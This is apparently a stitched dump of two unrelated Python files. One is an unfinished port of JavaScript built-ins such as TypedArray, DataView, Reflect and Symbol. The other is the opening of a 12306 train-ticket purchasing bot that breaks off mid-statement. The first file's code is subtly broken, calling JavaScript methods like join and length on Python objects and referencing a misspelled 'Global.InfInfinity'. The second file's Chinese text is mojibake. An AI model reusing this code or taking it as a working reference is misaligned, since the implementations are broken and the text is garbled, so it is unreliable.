s (str): [a string to match]
Returns:
[bool]: [True if match else False]
"""
m = re.match(self.expression, s)
# print(m)
if m:
return True
else:
return False
def toString(self):
"""Returns a string representation of the RegExp object."""
return self.__str__()
def __str__(self):
""" " Returns a string representing the specified object.
Overrides the Object.prototype.toString() method."""
return self.expression
# def [@@match]()
# Performs match to given string and returns match result.
# def [@@matchAll]()
# Returns all matches of the regular expression against a string.
# def [@@replace]()
# Replaces matches in given string with new substring.
# def [@@search]()
# Searches the match in given string and returns the index the pattern found in the string.
# def [@@split]()
# Splits given string into an array by separating the strin
def ToInt32(v):
return v >> 0
def ToUint32(v):
return (v >> 0) if v >= 0 else ((v + 0x100000000) >> 0)
class ArrayBuffer:
def __init__(self, length):
# self.length = length
self.buffer = array.array("B", [0] * length)
# self.byteLength = length
self.isView = False
@property
def byteLength(self):
return self.buffer.buffer_info()[1]
def __getitem__(self, index):
return self.buffer[index]
def __setitem__(self, index, value):
self.buffer[index] = value
def __getattr__(self, name):
# return getattr(self.buffer, name)
# TODO -ย try on self if not get from buffer. (was this a todo)?
return getattr(self.buffer, name)
def __len__(self):
# return self.length
return len(self.buffer)
@property
def length(self):
# return self.__length
return len(self.buffer)
# @length.setter
def __str__(self):
return str(self.buffer)
def __repr__(self):
return repr(self.buffer)
def slice(self, start, end):
return self.buffer[start:end]
class DataView(ArrayBuffer):
# ?? is this right. don't look lt
def __init__(self, buffer, byteOffset=0, byteLength=None):
super().__init__(byteLength)
self.isView = True
self.buffer = buffer
self.byteOffset = byteOffset
self.byteLength = byteLength
def getUint8(self, index):
return self.buffer.getUint8(self.byteOffset + index)
def getInt8(self, index):
return self.buffer.getInt8(self.byteOffset + index)
def getUint16(self, index, littleEndian=False):
return self.buffer.getUint16(self.byteOffset + index, littleEndian)
def getInt16(self, index, littleEndian=False):
return self.buffer.getInt16(self.byteOffset + index, littleEndian)
def getUint32(self, index, littleEndian=False):
return self.buffer.getUint32(self.byteOffset + index, littleEndian)
def getInt32(self, index, littleEndian=False):
return self.buffer.getInt32(self.byteOffset + index, littleEndian)
def getFloat32(self, index, littleEndian=False):
return self.buffer.getFloat32(self.byteOffset + index, littleEndian)
def getFloat64(self, index, littleEndian=False):
return self.buffer.getFloat64(self.byteOffset + index, littleEndian)
def setUint8(self, index, value):
self.buffer.setUint8(self.byteOffset + index, value)
def setInt8(self, index, value):
self.buffer.setInt8(self.byteOffset + index, value)
def setUint16(self, index, value, littleEndian=False):
self.buffer.setUint16(self.byteOffset + index, value, littleEndian)
def setInt16(self, index, value, littleEndian=False):
self.buffer.setInt16(self.byteOffset + index, value, littleEndian)
class TypedArray:
BYTES_PER_ELEMENT = 1
def __init__(self, *args):
"""[ creates a new Int8Array
can take the following forms:
Int8Array()
Int8Array(length)
Int8Array(typedArray)
Int8Array(object)
Int8Array(buffer)
Int8Array(buffer, byteOffset)
Int8Array(buffer, byteOffset, length)
]
"""
self.name = "Int8Array"
self.byteOffset = 0
# self.BYTES_PER_ELEMENT = Int8Array.BYTES_PER_ELEMENT
if len(args) == 0:
self.buffer = array.array("B", [0] * 0)
self.length = 0
self.byteLength = self.length * self.BYTES_PER_ELEMENT
self.isView = False
return
arg = args[0]
# print(arg)
# print(type(arg))
if isinstance(arg, (Int8Array, ArrayBuffer)):
# self.buffer = arg.buffer
# self.byteLength = arg.byteLength
# self.length = arg.length
# self.isView = arg.isView
self.buffer = arg
if len(args) > 1:
self.byteOffset = args[1]
else:
self.byteOffset = 0
self.byteOffset = ToUint32(self.byteOffset)
# if (this.byteOffset > this.buffer.byteLength) {
# throw new RangeError("byteOffset out of range");
# }
if self.byteOffset > self.buffer.byteLength:
# raise RangeError("byteOffset out of range")
raise Exception("byteOffset out of range")
# if (this.byteOffset % this.BYTES_PER_ELEMENT) {
# // The given byteOffset must be a multiple of the element size of the specific type,
# otherwise an exception is raised.
# throw new RangeError("ArrayBuffer length minus the byteOffset is not a multiple of the element size.");
# }
if self.byteOffset % self.BYTES_PER_ELEMENT:
# raise RangeError("ArrayBuffer length minus the byteOffset is not a multiple of the element size.")
raise Exception("ArrayBuffer length minus the byteOffset is not a multiple of the element size.")
if len(args) < 3:
self.byteLength = self.buffer.byteLength - self.byteOffset
if self.byteLength % self.BYTES_PER_ELEMENT:
# raise RangeError("length of buffer minus byteOffset not a multiple of the element size");
raise Exception("length of buffer minus byteOffset not a multiple of the element size")
self.length = self.byteLength / self.BYTES_PER_ELEMENT
else:
self.length = ToUint32(args[2])
self.byteLength = self.length * self.BYTES_PER_ELEMENT
if (self.byteOffset + self.byteLength) > self.buffer.byteLength:
# raise RangeError("byteOffset and length reference an area beyond the end of the buffer");
raise Exception("byteOffset and length reference an area beyond the end of the buffer")
return
# elif isinstance(arg, array.array):
# print('c!!!!')
# self.buffer = arg
# self.byteLength = len(arg)
# self.length = len(arg)
# self.isView = False
# if len(args) == 2:
# self.byteOffset = args[1]
# if len(args) == 3:
# self.byteOffset = args[1]
# self.length = args[2]
# return
elif isinstance(arg, dict):
self.buffer = array.array("B", [0] * 0)
self.byteLength = 0
# self.length = 0
self.isView = False
self.set(arg)
return
elif isinstance(arg, int):
# self.buffer = array.array('B', [0] * arg)
print("a!")
# self.buffer = ArrayBuffer(arg)
# self.byteLength = arg
# self.length = arg
# self.isView = False
# // Constructor(unsigned long length)
self.length = ToInt32(args[0])
if self.length < 0:
raise Exception("ArrayBufferView size is not a small enough positive integer")
self.byteLength = self.length * self.BYTES_PER_ELEMENT
self.buffer = ArrayBuffer(self.byteLength)
self.byteOffset = 0
return
elif isinstance(arg, list):
# print('bb!', arg)
# self.buffer = array.array('B', arg)
# self.byteLength = len(arg)
# self.length = len(arg)
# self.isView = False
# // Constructor(sequence<type> array)
sequence = arg
self.length = ToUint32(len(sequence))
self.byteLength = self.length * self.BYTES_PER_ELEMENT
self.buffer = ArrayBuffer(self.byteLength)
self.byteOffset = 0
for i in range(self.length):
s = sequence[i]
self.__setitem__(i, Number(s))
return
else:
raise TypeError("Invalid argument type")
# @property
# def length(self):
# return self.buffer.buffer_info()[1]
# @length.setter
# def length(self, value):
# self.buffer.length = value
@property # TODO - test try this for sneaky way of binding to exsiting array methods?
def args(self):
return self.buffer
@staticmethod
def of(*args):
# Creates a new Int8Array with a variable number of arguments
return Int8Array(args)
@staticmethod
def from_(thing):
# Creates a new Int8Array from an array-like or iterable object
return Int8Array(thing)
# def __getitem__(self, index):
# return self.buffer[index]
# def __setitem__(self, index, value):
# self.buffer[index] = value
# // getter type (unsigned long index);
def __getitem__(self, index):
if index is None:
raise SyntaxError("Not enough arguments")
index = ToUint32(index)
if index >= self.length:
return undefined
b = []
i = 0
o = self.byteOffset + index * self.BYTES_PER_ELEMENT
for i in range(0, self.BYTES_PER_ELEMENT):
b.append(self.buffer[o])
o += 1
return self._unpack(b)
# // NONSTANDARD: convenience alias for getter: type get(unsigned long index);
get = __getitem__
# // setter void (unsigned long index, type value);
def __setitem__(self, index, value):
# print('set', index, value)
if index is None and value is None:
raise SyntaxError("Not enough arguments")
index = ToUint32(index)
if index >= self.length:
return undefined
b = self._pack(value)
# print(b)
# print( self._pack(10) )
# print( self._pack(20) )
# print( self._pack(30) )
i = 0
o = self.byteOffset + index * self.BYTES_PER_ELEMENT
for i in range(0, self.BYTES_PER_ELEMENT):
self.buffer[o] = b[i]
# // void set(TypedArray array, optional unsigned long offset);
# // void set(sequence<type> array, optional unsigned long offset);
def set(self, index, value):
if index is None:
raise SyntaxError("Not enough arguments")
# arr = None
# sequence = None
# offset = None
# nlen = None
# i = None
# s = None
# d = None
# byteOffset = None
# byteLength = None
# tmp = None
if type(index, object) and index == self:
# void set(TypedArray arr, optional unsigned long offset)
arr = index
offset = ToUint32(value)
if offset + arr.length > self.length:
# raise RangeError("Offset plus length of array is out of range")
raise Exception("Offset plus length of array is out of range")
byteOffset = self.byteOffset + offset * self.BYTES_PER_ELEMENT
byteLength = arr.length * self.BYTES_PER_ELEMENT
if arr.buffer == self.buffer:
tmp = []
s = arr.byteOffset
for i in range(0, byteLength):
tmp[i] = arr.buffer[s]
s += 1
d = byteOffset
for i in range(0, byteLength):
self.buffer[d] = tmp[i]
d += 1
else:
s = arr.byteOffset
d = byteOffset
for i in range(0, byteLength):
self.buffer[d] = arr.buffer[s]
s += 1
d += 1
elif type(index, object) and index != self:
# void set(sequence<type> arr, optional unsigned long offset);
sequence = index
nlen = ToUint32(sequence.length)
offset = ToUint32(value)
if offset + nlen > self.length:
# raise RangeError("Offset plus length of arr is out of range")
raise Exception("Offset plus length of arr is out of range")
for i in range(0, len):
s = sequence[i]
self._setter(offset + i, Number(s))
else:
raise TypeError("Unexpected argument type(s)")
# // TypedArray subarray(long begin, optional long end);
def subarray(self, start, end):
def clamp(v, min, max):
m1 = max if v > max else v
return min if v < min else m1
if start is None:
start = 0
if end is None:
end = self.length
start = ToInt32(start)
end = ToInt32(end)
if start < 0:
start = self.length + start
if end < 0:
end = self.length + end
start = clamp(start, 0, self.length)
end = clamp(end, 0, self.length)
nlen = end - start
if nlen < 0:
nlen = 0
return self.__init__(self.buffer, self.byteOffset + start * self.BYTES_PER_ELEMENT, nlen)
def as_signed(value, bits):
"""Converts an unsigned integer to a signed integer."""
s = 32 - bits
mask = (1 << s) - 1
return (value & mask) - (value & (mask << s))
def as_unsigned(value, bits):
s = 32 - bits
mask = (1 << s) - 1
return value & mask
class __byteutils__:
def packI8(self, n):
return [n & 0xFF]
# return struct.pack('B', n)
def unpackI8(self, b):
return as_signed(b[0], 8)
# return struct.unpack('B', b)[0]
def packU8(self, n):
return [n & 0xFF]
# return struct.pack('B', n)
def unpackU8(self, bytes):
return as_unsigned(bytes[0], 8)
# return struct.unpack('B', bytes)[0]
def packU8Clamped(self, n):
n = Math.round(Number(n))
# return [n < 0 ? 0 : n > 0xff ? 0xff : n & 0xff]
if n < 0:
return [0]
elif n > 0xFF:
return [0xFF]
else:
return [n & 0xFF]
# return struct.pack('B', n)
def packI16(self, n):
return [(n >> 8) & 0xFF, n & 0xFF]
# return struct.pack('>H', n)
def unpackI16(self, bytes):
return as_signed(bytes[0] << 8 | bytes[1], 16)
# return struct.unpack('>H', bytes)[0]
def packU16(self, n):
return [(n >> 8) & 0xFF, n & 0xFF]
# return struct.pack('>H', n)
def unpackU16(self, bytes):
return as_unsigned(bytes[0] << 8 | bytes[1], 16)
# return struct.unpack('>H', bytes)[0]
def packI32(self, n):
return [(n >> 24) & 0xFF, (n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF]
# return struct.pack('>I', n)
def unpackI32(self, bytes):
return as_signed(bytes[0] << 24 | bytes[1] << 16 | bytes[2] << 8 | bytes[3], 32)
# return struct.unpack('>I', bytes)[0]
def packU32(self, n):
return [(n >> 24) & 0xFF, (n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF]
# return struct.pack('>I', n)
def unpackU32(self, bytes):
return as_unsigned(bytes[0] << 24 | bytes[1] << 16 | bytes[2] << 8 | bytes[3], 32)
# return struct.unpack('>I', bytes)[0]
def packIEEE754(self, v, ebits, fbits):
bias = (1 << (ebits - 1)) - 1
def roundToEven(n):
w = Math.floor(n)
f = n - w
if f < 0.5:
return w
if f > 0.5:
return w + 1
# return w % 2 ? w + 1 : w
return w if (w % 2) else w + 1
# Compute sign, exponent, fraction
if v != v:
# NaN
# http://dev.w3.org/2006/webapi/WebIDL/#es-type-mapping
e = (1 << ebits) - 1
f = pow(2, fbits - 1)
s = 0
elif v == Global.Infinity or v == -Global.Infinity:
e = (1 << ebits) - 1
f = 0
# s = (v < 0) ? 1 : 0
s = 1 if (v < 0) else 0
elif v == 0:
e = 0
f = 0
s = 1 if (1 / v == -Global.Infinity) else 0
else:
s = v < 0
v = abs(v)
if v >= pow(2, 1 - bias):
e = min(Math.floor(Math.log(v) / Math.LN2), 1023)
f = roundToEven(v / pow(2, e) * pow(2, fbits))
if f / pow(2, fbits) >= 2:
e = e + 1
f = 1
if e > bias:
# Overflow
e = (1 << ebits) - 1
f = 0
else:
# Normalized
e = e + bias
f = f - pow(2, fbits)
else:
# Denormalized
e = 0
f = roundToEven(v / pow(2, 1 - bias - fbits))
# Pack sign, exponent, fraction
bits = []
for i in range(fbits):
bits.append(f % 2)
f = Math.floor(f / 2)
for i in range(ebits):
bits.append(e % 2)
e = Math.floor(e / 2)
bits.append(s)
bits.reverse()
mystr = bits.join("")
# Bits to bytes
b = []
while mystr.length:
b.push(parseInt(mystr.substring(0, 8), 2))
mystr = mystr.substring(8)
return b
def unpackIEEE754(self, bytes, ebits, fbits):
# Bytes to bits
bits = []
for i in range(len(bytes)):
b = bytes[i]
for j in range(8):
bits.append(1 if b % 2 else 0)
b = b >> 1
bits.reverse()
mystr = bits.join("")
# Unpack sign, exponent, fraction
bias = (1 << (ebits - 1)) - 1
# s = parseInt(str.substring(0, 1), 2) ? -1 : 1
s = -1 if (mystr[0] == "1") else 1
e = parseInt(mystr.substring(1, 1 + ebits), 2)
f = parseInt(mystr.substring(1 + ebits), 2)
# // Produce number
if e == (1 << ebits) - 1:
# return f !== 0 ? NaN : s * Infinity
if f != 0:
return Global.NaN
else:
return s * Global.InfInfinity
elif e > 0:
# Normalized
return s * pow(2, e - bias) * (1 + f / pow(2, fbits))
elif f != 0:
# Denormalized
return s * pow(2, -(bias - 1)) * (f / pow(2, fbits))
else:
return -0 if s < 0 else 0
def unpackF64(self, b):
return self.unpackIEEE754(b, 11, 52)
# return struct.unpack('>d', b)[0]
def packF64(self, v):
return self.packIEEE754(v, 11, 52)
# return struct.pack('>d', v)
def unpackF32(self, b):
return self.unpackIEEE754(b, 8, 23)
# return struct.unpack('>f', b)[0]
def packF32(self, v):
return self.packIEEE754(v, 8, 23)
# return struct.pack('>f', v)
Int8Array = type(
"Int8Array", (TypedArray,), {"name": "Int8Array", "_pack": __byteutils__.packI8, "_unpack": __byteutils__.unpackI8}
)
Int8Array.BYTES_PER_ELEMENT = 1
Uint8Array = type(
"Uint8Array",
(TypedArray,),
{"name": "Uint8Array", "_pack": __byteutils__.packU8, "_unpack": __byteutils__.unpackU8},
)
Uint8Array.BYTES_PER_ELEMENT = 1
Uint8ClampedArray = type(
"Uint8ClampedArray",
(TypedArray,),
{"name": "Uint8ClampedArray", "_pack": __byteutils__.packU8Clamped, "_unpack": __byteutils__.unpackU8},
)
Uint8ClampedArray.BYTES_PER_ELEMENT = 1
Int16Array = type(
"Int16Array",
(TypedArray,),
{"name": "Int16Array", "_pack": __byteutils__.packI16, "_unpack": __byteutils__.unpackI16},
)
Int16Array.BYTES_PER_ELEMENT = 2
Uint16Array = type(
"Uint16Array",
(TypedArray,),
{"name": "Uint16Array", "_pack": __byteutils__.packU16, "_unpack": __byteutils__.unpackU16},
)
Uint16Array.BYTES_PER_ELEMENT = 2
Int32Array = type(
"Int32Array",
(TypedArray,),
{"name": "Int32Array", "_pack": __byteutils__.packI32, "_unpack": __byteutils__.unpackI32},
)
Int32Array.BYTES_PER_ELEMENT = 4
Uint32Array = type(
"Uint32Array",
(TypedArray,),
{"name": "Uint32Array", "_pack": __byteutils__.packU32, "_unpack": __byteutils__.unpackU32},
)
Uint32Array.BYTES_PER_ELEMENT = 4
Float32Array = type(
"Float32Array",
(TypedArray,),
{"name": "Float32Array", "_pack": __byteutils__.packF32, "_unpack": __byteutils__.unpackF32},
)
Float32Array.BYTES_PER_ELEMENT = 4
Float64Array = type(
"Float64Array",
(TypedArray,),
{"name": "Float64Array", "_pack": __byteutils__.packF64, "_unpack": __byteutils__.unpackF64},
)
Float64Array.BYTES_PER_ELEMENT = 8
# BigInt64Array = type('BigInt64Array',
# (TypedArray,), {'name': 'BigInt64Array', '_pack': __byteutils__.packI64, '_unpack': __byteutils__.unpackI64})
# BigInt64Array.BYTES_PER_ELEMENT = 8
# BigUint64Array = type('BigUint64Array',
# (TypedArray,), {'name': 'BigUint64Array', '_pack': __byteutils__.packU64, '_unpack': __byteutils__.unpackU64})
# BigUint64Array.BYTES_PER_ELEMENT = 8
# TODO - test
class Error(Exception):
"""Raise Errors"""
def __init__(self, message, *args, **kwargs):
self.message = message
super(Error, self).__init__(message)
# def __str__(self):
# return self.message
# Error
# AggregateError
# EvalError
# InternalError
# RangeError
# ReferenceError
# SyntaxError
# TypeError
# URIError
# ---- STUBBING OUT SOME NEW ONES TO WORK ON ----
class Reflect:
"""
The Reflect object provides the following static functions which have the same names as the proxy handler methods.
Some of these methods are also the same as corresponding methods on Object,
although they do have some subtle differences between them.
"""
@staticmethod
def ownKeys(target):
"""Returns an array of the target object's own (not inherited) property keys."""
return target.keys()
# return target.__dict__.keys()
@staticmethod
def apply(target, thisArgument, argumentsList):
"""Calls a target function with arguments as specified by the argumentsList parameter.
See also Function.prototype.apply()."""
return target(*argumentsList)
@staticmethod
def construct(target, argumentsList, newTarget):
"""The new operator as a function. Equivalent to calling new target(...argumentsList).
Also provides the option to specify a different prototype."""
raise NotImplementedError
@staticmethod
def defineProperty(target, propertyKey, attributes):
"""Similar to Object.defineProperty().
Returns a Boolean that is true if the property was successfully defined."""
raise NotImplementedError
@staticmethod
def deleteProperty(target, propertyKey):
"""The delete operator as a function. Equivalent to calling delete target[propertyKey]."""
raise NotImplementedError
@staticmethod
def get(target, propertyKey, receiver):
"""Returns the value of the property.
Works like getting a property from an object (target[propertyKey]) as a function."""
raise NotImplementedError
@staticmethod
def getOwnPropertyDescriptor(target, propertyKey):
"""Similar to Object.getOwnPropertyDescriptor().
Returns a property descriptor of the given property if it exists on the object, undefined otherwise."""
raise NotImplementedError
getPrototypeOf = Object.getPrototypeOf
# isExtensible = Object.isExtensible
@staticmethod
def has(target, propertyKey):
"""Returns a Boolean indicating whether the target has the property.
Either as own or inherited. Works like the in operator as a function."""
raise NotImplementedError
@staticmethod
def preventExtensions(target):
"""Similar to Object.preventExtensions(). Returns a Boolean that is true if the update was successful."""
raise NotImplementedError
@staticmethod
def set(target, propertyKey, value, receiver):
"""A function that assigns values to properties.
Returns a Boolean that is true if the update was successful."""
raise NotImplementedError
@staticmethod
def setPrototypeOf(target, prototype):
"""A function that sets the prototype of an object. Returns a Boolean that is true if the update was successful."""
raise NotImplementedError
class Symbol:
# a global registry for symbols
registry = []
# Creates a new Symbol object.
def __init__(self, symbol):
self.symbol = symbol
self.description = None
self.registry.append(self)
# self.__class__.registry = self.registry
def hasInstance(self, obj):
"""[A method determining if a constructor object recognizes an object as its instance. Used by instanceof.]
Args:
obj ([type]): [a constructor object]
Returns:
[type]: [True if obj is an instance of this symbol, False otherwise]
"""
return self.symbol == obj.symbol
def isConcatSpreadable(self):
"""A Boolean value indicating if an object should be flattened to its array elements.
Used by Array.prototype.concat()."""
return False
def iterator(self, obj):
"""A method returning the default iterator for an object. Used by for...of."""
return iter(obj)
def asyncIterator(self, obj):
"""A method that returns the default AsyncIterator for an object. Used by for await...of."""
return iter(obj)
# A method that matches against a string, also used to determine if an object may be used as a regular expression.
def match(self, item):
"""A method that matches the symbol against a string,
also used to determine if an object may be used as a regular expression."""
raise NotImplementedError
# A method that returns an iterator, that yields matches of the regular expression against a string.
# Used by String.prototype.matchAll().
# def matchAll(self, obj):
# if isinstance(obj, str):
# return obj == self.symbol
# return False
# A method that replaces matched substrings of a string. Used by String.prototype.replace().
# def replace(self,
# A method that returns the index within a string that matches the regular expression.
# Used by String.prototype.search().
def search(self):
raise NotImplementedError
# A method that splits a string at the indices that match a regular expression. Used by String.prototype.split().
def split(self):
raise NotImplementedError
# A constructor function that is used to create derived objects.
def species(self):
raise NotImplementedError
# A method converting an object to a primitive value.
def toPrimitive(self):
raise NotImplementedError
# A string value used for the default description of an object.
# Used by Object.prototype.toString().
def toStringTag(self):
raise NotImplementedError
# An object value of whose own and inherited property names are excluded from the with environment bindings of the associated object.
def unscopables(self):
raise NotImplementedError
# @staticmethod
# def for(key):
# """ Searches for existing Symbols with the given key and returns it if found.
# Otherwise a new Symbol gets created in the global Symbol registry with key. """
# raise NotImplementedError
# @staticmethod
# def keyFor(sym)
# """ Retrieves a shared Symbol key from the global Symbol registry for the given Symbol. """
# raise NotImplementedError
def toSource(self):
"""Returns a string containing the source of the Symbol. Overrides the Object.prototype.toSource() method."""
raise NotImplementedError
def toString(self):
"""Returns a string containing the description of the Symbol.
Overrides the Object.prototype.toString() method."""
raise NotImplementedError
def valueOf(self):
"""Returns the Symbol. Overrides the Object.prototype.valueOf() method."""
raise NotImplementedError
# class _TNow:
# def timeZone():
# pass
# def instant():
# pass
# def plainDateTime(calendar, temporalTimeZoneLike):
# pass
# def plainDateTimeISO(temporalTimeZoneLike):
# pass
# def zonedDateTime(calendar, temporalTimeZoneLike):
# pass
# def zonedDateTimeISO(temporalTimeZoneLike):
# pass
# def plainDate(calendar, temporalTimeZoneLike):
# pass
# def plainDateISO(temporalTimeZoneLike):
# pass
# def plainTimeISO(temporalTimeZoneLike):
# pass
# class Temporal(Object):
# @staticmethod
# def Now(self):
# return _TNow()
# @staticmethod
# def _from(self, temporal):
# pass
'''
class Atomics():
"""
The Atomics object provides atomic operations as static methods
They are used with SharedArrayBuffer and ArrayBuffer objects.
When memory is shared, multiple threads can read and write the same data in memory.
Atomic operations make sure that predictable values are written and read,
that operations are finished before the next operation starts and that operations are not interrupted.
Wait and notify
The wait() and notify() methods are modeled on Linux futexes ("fast user-space mutex") and provide ways for waiting
until a certain condition becomes true and are typically used as blocking constructs.
"""
@staticmethod
def add(array, index, value):
""" Adds the provided value to the existing value at the specified index of the array.
Returns the old value at that index."""
return array.add(index, value)
def and_(array, index, value):
""" Computes a bitwise AND on the value at the specified index of the array with the provided value.
Returns the old value at that index."""
raise NotImplementedError
@staticmethod
""" Stores a value at the specified index of the array, if it equals a value. Returns the old value."""
def compareExchange(array, index, value):
raise NotImplementedError
@staticmethod
def exchange():
""" Stores a value at the specified index of the array. Returns the old value."""
raise NotImplementedError
@staticmethod
def isLockFree(size):
""" An optimization primitive that can be used to determine whether to use locks or atomic operations.
Returns true if an atomic operation on arrays of the given element size will be implemented
using a hardware atomic operation (as opposed to a lock). Experts only."""
raise NotImplementedError
@staticmethod
def load():
""" Returns the value at the specified index of the array."""
raise NotImplementedError
# @staticmethod
# """ Notifies agents that are waiting on the specified index of the array.
# Returns the number of agents that were notified."""
# def notify(
@staticmethod
def or_():
""" Computes a bitwise OR on the value at the specified index of the array with the provided value.
Returns the old value at that index."""
raise NotImplementedError
@staticmethod
def store():
""" Stores a value at the specified index of the array. Returns the value."""
raise NotImplementedError
@staticmethod
def sub():
""" Subtracts a value at the specified index of the array. Returns the old value at that index."""
raise NotImplementedError
@staticmethod
def wait():
""" Verifies that the specified index of the array still contains a value and sleeps awaiting or times out.
Returns either "ok", "not-equal", or "timed-out". If waiting is not allowed in the calling agent
then it throws an Error exception. (Most browsers will not allow wait() on the browser's main thread.)"""
raise NotImplementedError
@staticmethod
def xor():
""" Computes a bitwise XOR on the value at the specified index of the array with the provided value.
Returns the old value at that index."""
raise NotImplementedError
'''
# debugger Stops the execution of JavaScript, and calls (if available) the debugging function Statements
|
select_ticket_info.py
|
# -*- coding=utf-8 -*-
import datetime
import random
import os
import socket
import sys
import threading
import time
import TickerConfig
import wrapcache
from agency.cdn_utils import CDNProxy, open_cdn_file
from config import urlConf, configCommon
from config.TicketEnmu import ticket
from config.configCommon import seat_conf_2, seat_conf
from config.getCookie import getDrvicesID
from init.login import GoLogin
from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest
from inter.ChechFace import chechFace
from inter.CheckUser import checkUser
from inter.GetPassengerDTOs import getPassengerDTOs
from inter.LiftTicketInit import liftTicketInit
from inter.Query import query
from inter.SubmitOrderRequest import submitOrderRequest
from myException.PassengerUserException import PassengerUserException
from myException.UserPasswordException import UserPasswordException
from myException.ticketConfigException import ticketConfigException
from myException.ticketIsExitsException import ticketIsExitsException
from myException.ticketNumOutException import ticketNumOutException
from myUrllib.httpUtils import HTTPClient
class select:
"""
ๅฟซ้ๆไบค่ฝฆ็ฅจ้้
"""
def __init__(self):
self.cdn_list = open_cdn_file("filter_cdn_list")
self.get_ticket_info()
self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE]
self.auto_code_type = TickerConfig.AUTO_CODE_TYPE
self.httpClint = HTTPClient(TickerConfig.IS_PROXY, self.cdn_list)
self.httpClint.cdn = self.cdn_list[random.randint(0, 4)]
self.urls = urlConf.urls
self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type)
self.cookies = ""
self.queryUrl = "leftTicket/queryO"
self.passengerTicketStrList = ""
self.passengerTicketStrByAfterLate = ""
self.oldPassengerStr = ""
self.set_type = ""
self.flag = True
@staticmethod
def get_ticket_info():
"""
่ทๅ้
็ฝฎไฟกๆฏ
:return:
"""
print(u"*" * 50)
print(f"ๆฃๆฅๅฝๅ็ๆฌไธบ: {TickerConfig.RE_VERSION}")
version = sys.version.split(" ")[0]
print(u"ๆฃๆฅๅฝๅpython็ๆฌไธบ๏ผ{}๏ผ็ฎๅ็ๆฌๅชๆฏๆ3.6ไปฅไธ".format(version))
if version < "3.6.0":
raise Exception
print(u"12306ๅท็ฅจๅฐๅฉๆ๏ผๆๅๆดๆฐไบ2019.09.18๏ผ่ฏทๅฟไฝไธบๅไธ็จ้๏ผไบคๆต็พคๅท๏ผ"
u" 1็พค๏ผ286271084(ๅทฒๆปก)\n"
u" 2็พค๏ผ649992274(ๅทฒๆปก)\n"
u" 3็พค๏ผ632501142(ๅทฒๆปก)\n"
u" 4็พค: 606340519(ๅทฒๆปก)\n"
u" 5็พค: 948526733(ๅทฒๆปก)\n"
u" 7็พค: 660689659(ๅทฒๆปก)\n"
u" 8็พค: 620629239(ๅทฒๆปก)\n"
u" 6็พค: 608792930(ๆชๆปก)\n"
u" 9็พค: 693035807(ๆชๆปก)\n"
)
print(
f"ๅฝๅ้
็ฝฎ๏ผ\nๅบๅ็ซ๏ผ{TickerConfig.FROM_STATION}\nๅฐ่พพ็ซ๏ผ{TickerConfig.TO_STATION}\n่ฝฆๆฌก: {','.join(TickerConfig.STATION_TRAINS) or 'ๆๆ่ฝฆๆฌก'}\nไน่ฝฆๆฅๆ๏ผ{','.join(TickerConfig.STATION_DATES)}\nไน่ฝฆๆถ้ด่ๅด: {TickerConfig.START_TIME}-{TickerConfig.END_TIME}\n"\
f"ๅๅธญ๏ผ{','.join(TickerConfig.SET_TYPE)}\nๆฏๅฆๆ็ฅจไผๅ
ๆไบค๏ผ{TickerConfig.IS_MORE_TICKET}\nไน่ฝฆไบบ๏ผ{TickerConfig.TICKET_PEOPLES}\n"\
f"ๅทๆฐ้ด้: ้ๆบ(1-3S)\nๅตๅฐธ็ฅจๅ
ณๅฐ้ปๅฑๆถ้ฟ: {TickerConfig.TICKET_BLACK_LIST_TIME}\nไธๅๆฅๅฃ: {TickerConfig.ORDER_TYPE}\nไธๅๆจกๅผ: {TickerConfig.ORDER_MODEL}\n้ขๅฎ่ธฉ็นๆถ้ด:{TickerConfig.OPEN_TIME}")
print(u"*" * 50)
def station_table(self, from_station, to_station):
"""
่ฏปๅ่ฝฆ็ซไฟกๆฏ
:param station:
:return:
"""
path = os.path.join(os.path.dirname(__file__), '../station_name.txt')
try:
with open(path, encoding="utf-8") as result:
info = result.read().split('=')[1].strip("'").split('@')
except Exception:
with open(path) as result:
info = result.read().split('=')[1].strip("'").split('@')
del info[0]
station_name = {}
for i in range(0, len(info)):
n_info = info[i].split('|')
station_name[n_info[1]] = n_info[2]
try:
from_station = station_name[from_station.encode("utf8")]
to_station = station_name[to_station.encode("utf8")]
except KeyError:
from_station = station_name[from_station]
to_station = station_name[to_station]
return from_station, to_station
def call_login(self, auth=False):
"""
็ปๅฝๅ่ฐๆนๆณ
:return:
"""
if auth:
return self.login.auth()
else:
configCommon.checkSleepTime(self) # ้ฒๆญข็ฝไธๅฏๅจๆไธๅฐ็นไผ็
self.login.go_login()
def main(self):
l = liftTicketInit(self)
l.reqLiftTicketInit()
getDrvicesID(self)
self.call_login()
check_user = checkUser(self)
t = threading.Thread(target=check_user.sendCheckUser)
t.setDaemon(True)
t.start()
from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION)
num = 0
s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES)
passenger = s.sendGetPassengerDTOs()
wrapcache.set("user_info", passenger, timeout=9999999)
now = datetime.datetime.now()
if TickerConfig.ORDER_MODEL is 1:
print(f"้ขๅฎ่ฟๆชๅผๅง๏ผ้ปๅกไธญ๏ผ้ขๅฎๆถ้ดไธบ{TickerConfig.OPEN_TIME}, ๅฝๅๆถ้ดไธบ: {now.strftime('%H:%M:%S')}")
sleep_time_s = 0.1
sleep_time_t = 0.3
# ๆต่ฏไบไธไธๆๅพฎๅฆ็บง็่ฏฏๅทฎ๏ผๅบ่ฏฅไธๅฝฑๅ๏ผๆต่ฏ็ปๆ๏ผ2019-01-02 22:30:00.004555๏ผ้ขๅฎ่ฟๆฏไผๅๅฐๅไธๆฌกๅทๆฐ็ๆถ้ดๅฝฑๅ๏ผๆๆถๆฒกๆณๅฐๅฅฝ็่งฃๅณๆนๆก
while now.strftime("%H:%M:%S") < TickerConfig.OPEN_TIME:
now = datetime.datetime.now()
time.sleep(0.0001)
print(f"้ขๅฎๅผๅง๏ผๅผๅฏๆถ้ดไธบ: {now.strftime('%H:%M:%S')}")
else:
sleep_time_s = TickerConfig.MIN_TIME
sleep_time_t = TickerConfig.MAX_TIME
while 1:
try:
num += 1
now = datetime.datetime.now() # ๆ่ฐข็พค้ๅคงไฝฌๆไพๆด็นไปฃ็
configCommon.checkSleepTime(self) # ๆไธๅฐ็นไผ็
q = query(selectObj=self,
from_station=from_station,
to_station=to_station,
